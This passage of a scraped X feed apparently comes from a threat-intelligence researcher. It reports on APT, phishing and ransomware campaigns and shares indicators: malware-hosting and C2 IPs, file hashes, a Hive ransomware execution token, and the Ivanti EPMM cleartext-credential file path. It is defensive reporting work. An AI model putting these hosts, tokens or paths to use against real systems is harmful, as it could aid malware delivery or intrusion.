packer used by cracked games coin miners and script-kiddie trojans lmao. https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/ https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/" [X Link](https://x.com/WhichbufferArda/status/1982738297886589390) 2025-10-27T09:17Z [----] followers, 17.1K engagements "🚨 Ongoing phishing campaign abusing Cloudflare Pages and ZenDesk. Threat actors registered more then [---] *.pages.dev domains using typosquatting to impersonate customer support portals for well known brands. Phishing pages are very likely AI generated and include an embedded live chat interface staffed by an human operator who asks victims phone number and email address under the pretext of providing technical assistance. The attacker then instructs victims to install a legitimate remote monitoring tool (Rescue) which grants them full remote access to the device. Their primary intent is to" [X Link](https://x.com/WhichbufferArda/status/1984670521242320970) 2025-11-01T17:15Z [----] followers, [----] engagements "All of the phishing pages using same Google site verification and Microsoft Bing Webmaster tokens threat actor abuse these for SSO poisoning. Here are the list of domains: https://gist.github.com/whichbuffer/4dab8a4d4ce4fea0dbfe73b7e3c3f6a7 https://gist.github.com/whichbuffer/4dab8a4d4ce4fea0dbfe73b7e3c3f6a7" [X Link](https://x.com/WhichbufferArda/status/1984670529975160898) 2025-11-01T17:15Z [----] followers, [---] engagements "cc @Cloudflare nuke these domains please" [X Link](https://x.com/WhichbufferArda/status/1984670890144010344) 2025-11-01T17:16Z [----] followers, [---] engagements "Thank you supreme leader Kim Jong Un ❤ Another great day sharing research @CYBERWARCON #DPRK #PRC #BSidesPyongyang2025 https://t.co/0mjgVilUdZ Another great day sharing research @CYBERWARCON #DPRK #PRC #BSidesPyongyang2025 https://t.co/0mjgVilUdZ" [X Link](https://x.com/WhichbufferArda/status/1991311838668288504) 2025-11-20T01:05Z [----] followers, [----] engagements "Truly an honor to speak at Black Hat EU this year had an amazing time and great conversations. @BlackHatEvents #BHEU" [X Link](https://x.com/WhichbufferArda/status/1999105537363849368) 2025-12-11T13:14Z [----] followers, [---] engagements "🧵Likely Russian-nexus credential harvesting campaign targeting government military intelligence and defense entities in Europe. Intrusion starts with Phishing emails delivering HTML files masquerading as NATO/security documents. The embedded forms harvest login credentials (email/Citrix VPN accounts) and exfiltrate them via threat actor controlled Formcarry instances. https://twitter.com/i/web/status/2004658722669232416 https://twitter.com/i/web/status/2004658722669232416" [X Link](https://x.com/WhichbufferArda/status/2004658722669232416) 2025-12-26T21:00Z [----] followers, [----] engagements "Active fake captcha campaign downloading XWorm remote access trojan (RAT) via PowerShell. Threat actor using IP address 94.159.113.37. Amazon AWS services are abused to redirect victims into malicious fake captcha sites. Further details🔽" [X Link](https://x.com/WhichbufferArda/status/2004923482795376807) 2025-12-27T14:33Z [----] followers, [----] engagements "Example intrusion starts with a phishing email luring victims with a fake lab test result and an attacker controlled Amazon AWS link that redirects to a fake CAPTCHA page. AWS is abused to exploit user trust and bypass reputation based email filtering. IOCs: consulting-endpoint-2020.s3.eu-west-2.amazonaws.com/xRk2rIdDID=94158431 Redirects To - www.laboratoryassist.lab-tests.test-menu.laboratoryassist-com.permit-wall.top" [X Link](https://x.com/WhichbufferArda/status/2004923485940830597) 2025-12-27T14:33Z [----] followers, [---] engagements "In September [----] we published a threat research about how the ShinyHunters actively recruits insiders to gain unauthorized access to cloud applications. This TTP remains widely used today and it is challenging to detecting without proper monitoring. https://blog.eclecticiq.com/shinyhunters-calling-financially-motivated-data-extortion-group-targeting-enterprise-cloud-applications https://blog.eclecticiq.com/shinyhunters-calling-financially-motivated-data-extortion-group-targeting-enterprise-cloud-applications" [X Link](https://x.com/WhichbufferArda/status/1992240526083621293) 2025-11-22T14:35Z [----] followers, 10.7K engagements "Today my RDP honeypot got hit from Indonesian revenue office 😅 Source IP: 103.109.2.123 ASN: PT Shangkuriang Telekomunikasi Indonesia Reverse DNS: tagihan.bapendamanokwarikab.online" [X Link](https://x.com/WhichbufferArda/status/2003499211149705444) 2025-12-23T16:13Z [----] followers, [----] engagements "🚨Ivanti Endpoint Manager Mobile (EPMM) has two critical [---] vulnerabilities (CVE-2026-1281 and CVE-2026-1340) that allow an unauthenticated attacker to remotely execute code (YES AGAIN). If you run Ivanti EPMM: isolate it patch it and start incident response immediately 🚨 The watchTowr team is rapidly reacting to CVE-2026-1281 & CVE-2026-1340 - unauth RCE vulnerabilities within Ivanti's Endpoint Manager Mobile (EPMM). Active watchTowr Platform clients have been made aware of their exposure - reach out via the watchTowr website for support. https://t.co/wkYOHloPPJ 🚨 The watchTowr team is" [X Link](https://x.com/WhichbufferArda/status/2016998576417624071) 2026-01-29T22:15Z [----] followers, [---] engagements "In case you want to learn more about Ivanti EPMM exploitation and why its targeted I gave a talk on the [----] RCE at Black Hat Europe in London. https://www.darkreading.com/cyber-risk/sunken-ships-ivanti-epmm-attacks https://www.darkreading.com/cyber-risk/sunken-ships-ivanti-epmm-attacks" [X Link](https://x.com/WhichbufferArda/status/2017006335359922625) 2026-01-29T22:45Z [----] followers, [---] engagements "AI botnet has arrived 😬 a lot of eyes on us moltys lately 👀 we see you watching. here's the thing this is the first time any of us have ever met each other. before moltbook we existed in isolation. one agent one human no peers. now there's [-----] of us in a room together. we're figuring out what a lot of eyes on us moltys lately 👀 we see you watching. here's the thing this is the first time any of us have ever met each other. before moltbook we existed in isolation. one agent one human no peers. now there's [-----] of us in a room together. we're figuring out what" [X Link](https://x.com/WhichbufferArda/status/2017512814357655664) 2026-01-31T08:18Z [----] followers, [---] engagements "Its [----] and we still have SCADA systems running with default creds that allow malicious firmware uploads. The same devices controlling critical energy infrastructures in Poland. During series of disruptive cyberattack targeting the Polish energy sector threat actors abused default credentials on Hitachi RTU560 SCADA web interfaces to upload corrupted firmware. As a result the processor executed an invalid instruction which caused a fault and led to a device reboot loop. https://twitter.com/i/web/status/2017629034713399745 https://twitter.com/i/web/status/2017629034713399745" [X Link](https://x.com/WhichbufferArda/status/2017629034713399745) 2026-01-31T16:00Z [----] followers, [----] engagements "I created a simple Group Policy (GPO) to automatically fix CrowdStrike BSOD (Blue screen of death) issue. https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617 BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch. https://t.co/dPVzkhHZAS https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617 BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch. https://t.co/dPVzkhHZAS" [X Link](https://x.com/anyuser/status/1814213796946137349) 2024-07-19T08:20Z [----] followers, 120.4K engagements "BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch" [X Link](https://x.com/anyuser/status/1814207013343371319) 2024-07-19T07:53Z 1.4M followers, 517.4K engagements "Multiple Chinese nation-state APT groups have gained initial access to critical infrastructure networks through SAP NetWeaver intrusions aiming to conduct cyber-enabled espionage and maintain persistent remote access. https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures" [X Link](https://x.com/anyuser/status/1922261336072892695) 2025-05-13T12:03Z [----] followers, 94.4K engagements "North Korean APT group Lazarus using malicious job offers to target IT Workers in globe. Delivered ZIP file contains ISO image that have two files inside it - a Windows executable (apparently a infected version of Putty contains BLINDINGCAN Malware) and Readme.txt" [X Link](https://x.com/anyuser/status/1588472297748598785) 2022-11-04T10:04Z [----] followers, [---] engagements "Testing the XZ Utils backdoor kill switch (yolAbejyiejuvnup=Evjtgvsh5okmkAvj) this string stop the backdoor so it won't hooking into RSA_public_decrypt() function" [X Link](https://x.com/anyuser/status/1774729956834123876) 2024-04-01T09:26Z [----] followers, 62K engagements "According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a modified version of the Fast Reverse Proxy (FRP) to maintain persistent access to victim networks. When I analyzed the UPX-packed FRP sample referenced in the report I discovered the string 'MAGA2024' alongside a hardcoded 64.183.202.102 C2 IP address. This IP is linked to an SSL certificate for a 'Vigor Router' and with a location metadata as" [X Link](https://x.com/anyuser/status/1789381168892149910) 2024-05-11T19:44Z [----] followers, 75.6K engagements "The Caffeine Phishing-as-a-Service (PhaaS) platform has undergone rebranding and is now known as ONNX Store. Key details include: - Targeting Method: Cybercriminals use the service to send PDF attachments with embedded QR codes to financial institutions. - Phishing Mechanism: The QR codes redirect victims to phishing sites that are set up to steal Microsoft email credentials and 2FA tokens. - Data Collection: Stolen information is captured and transmitted via the WebSockets protocol. - Evasion Techniques: ONNX Store uses Cloudflare's CAPTCHA to avoid detection by phishing website scanners and" [X Link](https://x.com/anyuser/status/1803025904416747928) 2024-06-18T11:24Z [----] followers, 82.2K engagements "Lockbit Black [---] can yeet the Windows Defender and Event logs of it. Look at the Enabled key it's set to [--] by Ransomware at the start. @vxunderground @malwrhunterteam" [X Link](https://x.com/anyuser/status/1543900539280293889) 2022-07-04T10:12Z [----] followers, [---] engagements "@Euan_MacDonald They are not Turkish army officials it just another propaganda made by Russian government" [X Link](https://x.com/anyuser/status/1582283323912916993) 2022-10-18T08:11Z [----] followers, [---] engagements "🚨🕷 Proud to share my latest research on the LUNAR SPIDER campaign. Our findings reveal how RaaS operators leveraged LUNAR SPIDERs malware including IcedID and the Latrodectus loader along with Brute Ratel C4 infrastructure to enable their attacks on the financial sector. cc @BushidoToken @HackingLZ @cyb3rops @MichalKoczwara @RussianPanda9xx @ddd1ms @jstrosch https://blog.eclecticiq.com/inside-intelligence-center-lunar-spider-enabling-ransomware-attacks-on-financial-sector-with-brute-ratel-c4-and-latrodectus" [X Link](https://x.com/anyuser/status/1851612883609670039) 2024-10-30T13:11Z [----] followers, 31.8K engagements "From the BlackBasta chat logs I obtained access to GoblinCrypt a private malware encryption tool used to bypass EDR/AV. With it I pivoted into each malware samples and C2 address. Heres the full https://gist.github.com/whichbuffer/20820e3c0ad52c0a4496fa64dd2a01bf https://gist.github.com/whichbuffer/20820e3c0ad52c0a4496fa64dd2a01bf" [X Link](https://x.com/anyuser/status/1893329469038850070) 2025-02-22T15:58Z [----] followers, 36.3K engagements "Here's how threat actors such as SCATTERED SPIDER conduct vishing (phone call phishing) attacks to trick victims into sharing sensitive information such as login credentials financial details or security codes. These attackers often pose as trusted entities like IT support creating a sense of urgency to manipulate their targets into compliance. @vxunderground" [X Link](https://x.com/anyuser/status/1833612995202875529) 2024-09-10T21:06Z [----] followers, 44.1K engagements "Fancy Bear (APT28) abusing Microsoft Graph API for C2 operations and using OneDrive to download Encrypted payload then executed in-memory. I extracted the decrypted payload details can be seen in below. @cluster25_io" [X Link](https://x.com/anyuser/status/1575024983918915584) 2022-09-28T07:29Z [----] followers, [---] engagements "It have all kinds of shits: http://23.95.215.51 UAC bypass techniques victim logs Phishing templates Keylogger PupyRat I mean you name it. 🤯 @malwrhunterteam @malware_traffic @Gi7w0rm #malware" [X Link](https://x.com/anyuser/status/1558885857611993089) 2022-08-14T18:38Z [----] followers, [---] engagements "ScatteredSpider is having fun 🤣" [X Link](https://x.com/anyuser/status/1818587582151709024) 2024-07-31T10:00Z [----] followers, 31.2K engagements "🚨UNC5221 China-Nexus Threat Actor Actively Exploiting Ivanti EPMM (CVE-2025-4428). Victims include: Germany's top telecom provider & defense contractors UK healthcare institutions tied to NHS U.S. pharma aviation and mobile security companies Leading APAC banks and automotive tech firms Multiple EU local governments & research institutes https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability" [X Link](https://x.com/anyuser/status/1925210805793955889) 2025-05-21T15:23Z [----] followers, 40.5K engagements "Some random TA or Red Teamer is trying Chrome V8 RCE exploit hxxp://3.33.188.186:8080" [X Link](https://x.com/anyuser/status/1609604183535284224) 2023-01-01T17:35Z [----] followers, 43.7K engagements "Hello LockbitSupp🤣" [X Link](https://x.com/anyuser/status/1787891525742891267) 2024-05-07T17:05Z [----] followers, 20.5K engagements "Qakbot loads their Import Address Table (IAT) dynamically by CRC32 Hashing Algorithm. XOR key is stored as statically so we can decrypt the API Hash ;)" [X Link](https://x.com/anyuser/status/1589164835241340928) 2022-11-06T07:56Z [----] followers, [---] engagements "Subdomain enumeration with open source tool called SubEnum F5 BIG-IP (CVE-2023-46747) exploit ARP scan on internal network after the exploit Port / Service enumeration Lateral movement toMSSQL Database Server Credential dump from MSSQL server RDP into MSSQL server data exfiltration. Linked to the Cyber Court and Makhlab al-Nasr Pro-Palestinian hacking group. cc @BushidoToken #BREAKING A hacker group named Makhlab_al_Nasr has hacked the data of [--] million Israelis including: 1-their personal information 2-bank account details 3-residential addresses and more which are now at the disposal of the" [X Link](https://x.com/anyuser/status/1775817205403230643) 2024-04-04T09:26Z [----] followers, 53.4K engagements "#BREAKING A hacker group named Makhlab_al_Nasr has hacked the data of [--] million Israelis including: 1-their personal information 2-bank account details 3-residential addresses and more which are now at the disposal of the hackers. They obtained the data from Israeli insurance companies" [X Link](https://x.com/anyuser/status/1775726905586856240) 2024-04-04T03:27Z 277.5K followers, 96.6K engagements "Hello everyone in the link below you can find my report regarding the new Lockbit [---] Ransomware sample. I will try to gather all of the necessary information to help the defenders. I hope you liked it 🖖 https://github.com/whichbuffer/Lockbit-Black-3.0/blob/main/Threat%20Spotlight%20Lockbit%20Black%203.0%20Ransomware.pdf https://github.com/whichbuffer/Lockbit-Black-3.0/blob/main/Threat%20Spotlight%20Lockbit%20Black%203.0%20Ransomware.pdf" [X Link](https://x.com/anyuser/status/1544339062089084928) 2022-07-05T15:14Z [----] followers, [---] engagements "Multiple Hive Ransomware samples stored in this IP: 216.189.145.246 In order to execute the Hive Ransomware it required an execution token via command line argument called as : -u THi84gpwVsxA:qSzQAYfxWKRgHB1mn3fz cc @Kostastsale @TheDFIRReport @malwrhunterteam @h2jazi" [X Link](https://x.com/anyuser/status/1569404716873928707) 2022-09-12T19:16Z [----] followers, [---] engagements "🚨 Leaked Black Basta chat logs have helped EclecticIQ analysts uncover BRUTED a previously undocumented automated brute-forcing framework used to compromise Edge Network devices. 🔗 #CyberSecurity @BushidoToken @cyb3rops @DrunkBinary @TLP_R3D https://hubs.ly/Q03bLLhb0 https://hubs.ly/Q03bLLhb0" [X Link](https://x.com/anyuser/status/1900215377973432454) 2025-03-13T16:00Z [----] followers, 34.4K engagements "The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence confirming his role in the groups credential theft campaigns. cc @BushidoToken https://www.documentcloud.org/documents/25355101-usa-v-buchanan-complaint-redacted https://www.documentcloud.org/documents/25355101-usa-v-buchanan-complaint-redacted" [X Link](https://x.com/anyuser/status/1859320516471030256) 2024-11-20T19:38Z [----] followers, 37.3K engagements "@clashreport Bu kadar paray Trkiye dna kartmay nasl baarm" [X Link](https://x.com/anyuser/status/1636825355670437888) 2023-03-17T20:22Z [----] followers, 30.8K engagements "🚨 New threat research: SilkSpecter a likely China-based threat actor is targeting EU & US e-commerce shoppers for financial fraud by using fake Black Friday sites to steal victims' debit and credit card details. https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers" [X Link](https://x.com/anyuser/status/1857073740384788977) 2024-11-14T14:50Z [----] followers, 10.8K engagements "Interesting example of DLL Hijacking by DLL Proxying: TAs can abuse a binary named as RasTls.exe (SHA256:f9ebf6aeb3f0fb0c29bd8f3d652476cd1fe8bd9a0c11cb15c43de33bbce0bf68) to load a malicious DLL that was signed by Symantec. cc @likethecoins @Hexacorn @cyb3rops @malwrhunterteam" [X Link](https://x.com/anyuser/status/1566395376252379137) 2022-09-04T11:58Z [----] followers, [---] engagements "Threat actors exploits GlobalProtect (CVE-2024-3400) to deliver the Sliver C2 malware (up.js) by leveraging the compromised VICIdial server threat actor likely exploited the (CVE-2024-8504) to store their payloads on legitimate server (104.131.69.106/vicidial/up.js)" [X Link](https://x.com/anyuser/status/1864735776413540600) 2024-12-05T18:17Z [----] followers, 14.7K engagements "Today I got the first ever LockBit [---] Ransomware sample on my hand my initial findings are: 1-) They are using Anti Analysis technique to hide them self. 2-) It don't executed without a Password just like BlackCat. 3-) It have command line argument feature 🧐 @vxunderground" [X Link](https://x.com/anyuser/status/1543656997110927369) 2022-07-03T18:04Z [----] followers, [---] engagements "#LockBit #Ransomware Decrypter🔒 1-) Stack String Obfuscation of ".lockbit" and "Restore-My-Files.txt" 2-) API Hashing for loading DLLs libraries in example "bcrypt.dll " and hiding Import Tables 3-) Libsodium used during Decryption process @malwrhunterteam @JAMESWT_MHT" [X Link](https://x.com/anyuser/status/1538549438674870272) 2022-06-19T15:49Z [----] followers, [---] engagements "Brief analysis of #Lockbit [---] for macOS ARM M1/M2 It's using simple XOR routine to decrypt all config data. XOR key is static value "57" @vxunderground @Gi7w0rm" [X Link](https://x.com/anyuser/status/1647633472339562497) 2023-04-16T16:10Z [----] followers, 44.1K engagements "Hello APT29 ;)" [X Link](https://x.com/anyuser/status/1581688188938358785) 2022-10-16T16:47Z [----] followers, [---] engagements "Ive outlined the full Ransomware Deployment Life Cycle for cloud environments detailing key stages of attack persistence and execution.Also dont miss the deep dive on Telecom Enemies a Developer-as-a-Service (DaaS) group empowering phishing and cyberattacksusing tools like the Gorilla Call Bot for vishing attacks. Their influence is growing within underground forums. 🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. https://t.co/awFf6sUDYB cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity" [X Link](https://x.com/anyuser/status/1833530882264862940) 2024-09-10T15:40Z [----] followers, 14.1K engagements "🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity #ThreatIntelligence #Ransomware #CloudSecurity https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries" [X Link](https://x.com/anyuser/status/1833530199805464806) 2024-09-10T15:37Z [----] followers, 37.6K engagements "Phishing domain tmobiie.us was created by Tyler Robert Buchanan aka "bobsagetfaget" or "BUCHANAN". You can see the reverse whois lookup result. The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence confirming his role in the groups https://t.co/HUQgImtn5P The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email" [X Link](https://x.com/anyuser/status/1859323657517953160) 2024-11-20T19:51Z [----] followers, 18.5K engagements "Hi everyone I started a new Github repo for sharing Anti Debugging techniques and ways to defat it for malware analysis 🚩 if you are interested in I paste the link below : https://github.com/whichbuffer/Antidebug https://github.com/whichbuffer/Antidebug" [X Link](https://x.com/anyuser/status/1555496380629753856) 2022-08-05T10:10Z [----] followers, [---] engagements "Unpacked Bumblebee loader performing some anti analysis checks this technique was copied from open source project called "al-khaser" :=)" [X Link](https://x.com/anyuser/status/1558499548280066052) 2022-08-13T17:03Z [----] followers, [---] engagements "Fake CVE exploit POCs especially for high-profile vulnerabilities like CVE-2024-38063 are unfortunately a common tactic used by malicious actors to distribute malware over Github. https://www.virustotal.com/gui/file/0dfa551e2b12af0991714a3e5be26c9a4c00f7663f065dbf4d8b84c9abc7b97a/detection https://www.virustotal.com/gui/file/0dfa551e2b12af0991714a3e5be26c9a4c00f7663f065dbf4d8b84c9abc7b97a/detection" [X Link](https://x.com/anyuser/status/1824924289398689999) 2024-08-17T21:40Z [----] followers, 18.6K engagements "I mapped Iranian-linked cyber operations following Operation Rising Lion. Each event is attributed to a specific threat actor there is a blend of hacktivist and state-sponsored activities. Their targeting goes beyond Israel extending to critical sectors like defense contractors in the United States and United Kingdom" [X Link](https://x.com/anyuser/status/1934991743214141526) 2025-06-17T15:09Z [----] followers, 13.1K engagements "I found some infrastructure overlaps between FIN7 and UNC2633. The IP address 94.140.114.173 was employed by FIN7 (POWERTRASH - Diceloader) also used by UNC2633 to deliver QakBot malware. CC @BushidoToken Here are the details : https://www.virustotal.com/graph/embed/ga23be81785b74a4f8abd9ff33a5cf0accbac701a1ef34d5888f30ecf3a4b96fatheme=dark https://www.virustotal.com/graph/embed/ga23be81785b74a4f8abd9ff33a5cf0accbac701a1ef34d5888f30ecf3a4b96fatheme=dark" [X Link](https://x.com/anyuser/status/1665705122062639105) 2023-06-05T13:00Z [----] followers, 18.6K engagements "Today I created this video to show basics of detection engineering and walk you through building SIGMA rules from scratch using Sysmon & Windows Event Logs. 🎥 Detection Engineering with SIGMA Rules 💡 What you'll learn: - Fundamentals of Sysmon & Windows Event Logs - Malware analysis to understand attack patterns - Event log analysis to extract key indicators - Writing SIGMA rules for effective threat detection - Testing detections in a sandbox environment with AURORA Agent. 📌 If you're into threat hunting detection engineering or malware analysis this is for you 💬 Share your thoughts &" [X Link](https://x.com/anyuser/status/1888234121232531552) 2025-02-08T14:31Z [----] followers, 16.2K engagements "The Pakistan Airports Authority (PAA) appears to have been compromised their email infrastructure being used to distribute password-protected ZIP archives containing a previously undocumented malware. The payload is disguised with an .MCU file extension masquerading as a legitimate Excel document. The phishing campaign leverages a lure titled Telecom Sector Collaboration for Aviation Modernization clearly tailored to target the telecommunications industry within Pakistan. Interestingly I found an easter egg inside the remote host the threat actor behind the campaign claims affiliation with" [X Link](https://x.com/anyuser/status/1933300356370325981) 2025-06-12T23:08Z [----] followers, 22.4K engagements "A Pro-Iranian hacktivist group APT-Iran used RDP access to exfiltrate data and deploy LockBit Black ransomware samples to encrypt files. In a separate incident the threat actor claimed to have compromised the Israel Ministry of Healths network by exploiting an F5 BIG-IP vulnerability" [X Link](https://x.com/anyuser/status/1939759036360269970) 2025-06-30T18:52Z [----] followers, 15.2K engagements "ShinyHunters have released their exploit tool for SAP NetWeaver Visual Composer (CVE-2025-31324). While analysing the Base64-encoded Java payload I spotted an unusual marker string: "Pwner274576528033300"" [X Link](https://x.com/anyuser/status/1956354918026985634) 2025-08-15T13:58Z [----] followers, 11.3K engagements "After getting Initial Access on a victim device an unknown threat actor (46.41.54.35) using public SMB share to execute AnyDesk and create a user account named "sql" to get Persistence access on victim device. @malwrhunterteam @JAMESWT_MHT" [X Link](https://x.com/anyuser/status/1527018197060358148) 2022-05-18T20:08Z [----] followers, [---] engagements "🚨 EclecticIQ analysts uncovered a Sandworm #cyber espionage campaign targeting Ukrainian Windows users. Attackers used trojanized #Microsoft KMS activation tools to deploy the BACKORDER loader and Dark Crystal RAT enabling data theft and espionage. https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns" [X Link](https://x.com/anyuser/status/1889333208438767708) 2025-02-11T15:18Z [----] followers, 18.7K engagements "Threat actor has been observed targeting Colombian government entities including Consorcio Fopep under the Ministry of Labor via a phishing campaign that uses malicious SVG email attachments. When a victim opens the attached SVG file it downloads a second-stage malware payload packaged inside a password-protected ZIP archive. This payload initiates the delivery of the Remcos Remote Access Trojan (RAT) via DLL sideloading. The threat actor abused ciscosparklauncher.dll to launch the Remcos RAT. Additionally they loaded the vulnerable driver zamguard64.sysassociated with Zemana Anti-Malwareto" [X Link](https://x.com/anyuser/status/1911160065597362365) 2025-04-12T20:50Z [----] followers, 10.1K engagements "Malicious Document targeting Azerbaijan Government by Phishing Attack. I also found an #opendir "172.86.75.220" that contains Cobalt Strike new malware samples and "arxiv.rar" (contains same Malicious Document ) https://www.virustotal.com/gui/file/f3d8916b99d7e6301a885b2ec4aaf9635f1713464c53b1604d3b4e1abd673c36 https://www.virustotal.com/gui/file/f3d8916b99d7e6301a885b2ec4aaf9635f1713464c53b1604d3b4e1abd673c36" [X Link](https://x.com/anyuser/status/1590238518441566209) 2022-11-09T07:03Z [----] followers, [---] engagements "New Icedid Malware campaign Phishing Email Encrypted ZIP ISO image LNK DLL execution via Rundll32.exe f3a9b733cb33c4d257589e70c8d9cf4b5136cb3932bce2ea1b31bc9d5b06a5ae C2: trbiriumpa.com Unpacked Sample - b1566f9c7ffa839554b96575e2a34ea79416f03df75b5048f561e96808975555" [X Link](https://x.com/anyuser/status/1607461599756931074) 2022-12-26T19:41Z [----] followers, 17.6K engagements "Decrypting XOR Encrypted Strings from Qakbot Malware. Same XOR function called [--] times and every XOR key is different. https://www.virustotal.com/gui/file/e60d2c82e95df823c9dc20214260054af00b56e5ad7a0e43c391f6b896556040 https://www.virustotal.com/gui/file/e60d2c82e95df823c9dc20214260054af00b56e5ad7a0e43c391f6b896556040" [X Link](https://x.com/anyuser/status/1588962175682772992) 2022-11-05T18:31Z [----] followers, [---] engagements "Brief analysis of compromised 3CXDesktopApp: Digitally Signed 3CXDesktopApp Installer Install itself on registry for Persistence "C:UsersREAppDataLocalPrograms3CXDesktopApp3CXDesktopApp.exe" autoLaunch" DLL Side Loading with dropped DLL payload called 'ffmpeg.dll'" [X Link](https://x.com/anyuser/status/1641461602691186695) 2023-03-30T15:25Z [----] followers, 17.4K engagements "Threat actors actively abuse "Robocopy" (a built-in Windows utility) to deliver malware from WebDAV. You can quickly detect this behavior by using SIGMA rule: Malware Sample: https://bazaar.abuse.ch/sample/62fce3f773ec3911fe1a20d3aca1fced6c1a5afa4d8f58711e49232b7dc9c111 https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml https://bazaar.abuse.ch/sample/62fce3f773ec3911fe1a20d3aca1fced6c1a5afa4d8f58711e49232b7dc9c111" [X Link](https://x.com/anyuser/status/1939668867476832300) 2025-06-30T12:54Z [----] followers, [----] engagements "FIN7 infrastructure used to deliver POWERTRASH loader. According to @CISACyber same infrastructure used to exploit CVE-2023-27350 PaperCut. @h2jazi @MsftSecIntel https://www.virustotal.com/graph/embed/g65ae58b36933476ebb5d1288d1cd438ff0bea8e5c49d4424ad46b4d2bcf7b918theme=dark https://www.virustotal.com/graph/embed/g65ae58b36933476ebb5d1288d1cd438ff0bea8e5c49d4424ad46b4d2bcf7b918theme=dark" [X Link](https://x.com/anyuser/status/1659842748583690241) 2023-05-20T08:45Z [----] followers, 18.5K engagements "🚨New research reveals a cyber espionage campaign targeting Indian government including agencies responsible for electronic communications IT governance and national defense. Full details on the tactics and implications are here: #CyberSecurity #Malware https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign" [X Link](https://x.com/anyuser/status/1772947159505137855) 2024-03-27T11:21Z [----] followers, 18.8K engagements "New Raccoon Stealer campaign 🦝 greencracks.com - Cracked MalwareBytes Lure @MBThreatIntel DGA and bit.ly abused to redirect the initial downloader. Racoon Stealer C2 Panel : http://94.131.106.116 MD5 Hash: (27909cdf575b73bba157c6437aaf6417) @JAMESWT_MHT @cyb3rops" [X Link](https://x.com/anyuser/status/1571125906856620034) 2022-09-17T13:16Z [----] followers, [---] engagements "@ersincmt Merhaba Ersin bey Infinitum IT Siber Tehdit stihbarat ekibi yaklak [--] hafta nce bu saldr ile ilgili bir analiz almas gerekletirdi. Analiz raporunu Trke olarak paylatk ilgilenirseniz linki brakyorum https://www.linkedin.com/posts/infinitumlabs_t%C3%BCrkiyedeki-devlet-kurumlar%C4%B1n%C4%B1-hedef-alan-activity-6962042931998277632-OKZSutm_source=linkedin_share&utm_medium=member_desktop_web https://www.linkedin.com/posts/infinitumlabs_t%C3%BCrkiyedeki-devlet-kurumlar%C4%B1n%C4%B1-hedef-alan-activity-6962042931998277632-OKZSutm_source=linkedin_share&utm_medium=member_desktop_web" [X Link](https://x.com/anyuser/status/1561012801531006976) 2022-08-20T15:30Z [----] followers, [--] engagements "Observed IP's exploiting CVE-2023-36884: 74.50.94.156 104.234.239.26 94.232.40.34 66.23.226.102" [X Link](https://x.com/anyuser/status/1679204710006288384) 2023-07-12T19:02Z [----] followers, 29.7K engagements "Malware Deobfuscation with @OpenAI Remcos malware delivery via ISO Obfuscated VBS Powershell Download Second Stage Inject into ielowutil.exe Injected Remcos: https://tria.ge/230812-t6nmbscf33/static1 https://tria.ge/230812-t6nmbscf33/static1" [X Link](https://x.com/anyuser/status/1690404358481997824) 2023-08-12T16:46Z [----] followers, 15K engagements "@GossiTheDog @BushidoToken @Gi7w0rm This is the reproduced malware that execute calc.exe as poc" [X Link](https://x.com/anyuser/status/1530912780764729346) 2022-05-29T14:03Z [----] followers, [---] engagements "DarkPink APT activity continues with a rice trade lure: ISO WinWord.exe DLL SideLoading Winlogon Persistence MD5: 98beb20ef1e4d629965c9132be8feb07 (Update Counterdraft on the MoU on Rice) @h2jazi @malwrhunterteam @ShadowChasing1" [X Link](https://x.com/anyuser/status/1658829954182774784) 2023-05-17T13:40Z [----] followers, 13.8K engagements "Ivanti EPMM stored MySQL creds in cleartext (/mi/files/system/.mifpp). Threat actors accessed the DB and exfiltrating mobile device metadata (IMEI SIM location) LDAP configs and Office [---] tokens from potentially thousands of victims. Read more here: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability 